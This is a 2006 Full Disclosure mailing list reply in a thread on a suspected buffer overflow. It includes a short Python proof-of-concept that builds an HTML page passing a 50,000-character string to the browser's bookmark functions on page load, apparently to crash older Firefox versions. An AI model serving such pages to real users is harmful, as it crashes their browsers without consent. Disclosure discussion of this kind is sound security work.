Full Disclosure mailing list archives

Buffer Overflow vulnerability in Windows Display Manager [Suspected]

From: casiamo <casiamo () gmail com>
Date: Mon, 2 Jan 2006 17:09:51 +0100

Hello Sumit,

I saw this for some time ago too and I far as I know the below code would do
the same,
with the versions below 1.0.7. As I remember were all input fields
"vulnerable". I have
choosen the bookmark "name" field, which will popup after loading with a
long buffer.

html = open("firefox.html", "w")
buff = 'A' * 50000
html.write("<html><head>\n"
           "<script type=\"text/javascript\">\n"
           "function bookmarksite(title, url){\n"
           "if (document.all)\n"
           "window.external.AddFavorite(url, title);\n"
           "else if (window.sidebar)\n"
           "window.sidebar.addPanel(title, url, \"\")}\n"
           "</script></head>\n"
           "<body onload=\"javascript:bookmarksite('"+buff+"',
'http://www.mozilla.org&apos;)\"

\n"

           "</body></html>")
html.close()

Regards,

Casiamo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected], (continued)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] Lise Moorveld (Jan 02)
  - Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] Stan Bubrouski (Jan 02)
    - Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] InfoSecBOFH (Jan 02)
    - RE: Buffer Overflow vulnerability in WindowsDisplay Manager [Suspected] Paul (Jan 03)
    - Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] ad () heapoverflow com (Jan 02)
    - Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] Sumit Siddharth (Jan 02)
    - Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] Sumit Siddharth (Jan 03)
    - Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] ad () heapoverflow com (Jan 03)
    - Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] InfoSecBOFH (Jan 03)
    - Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] InfoSecBOFH (Jan 03)
- Buffer Overflow vulnerability in Windows Display Manager [Suspected] casiamo (Jan 02)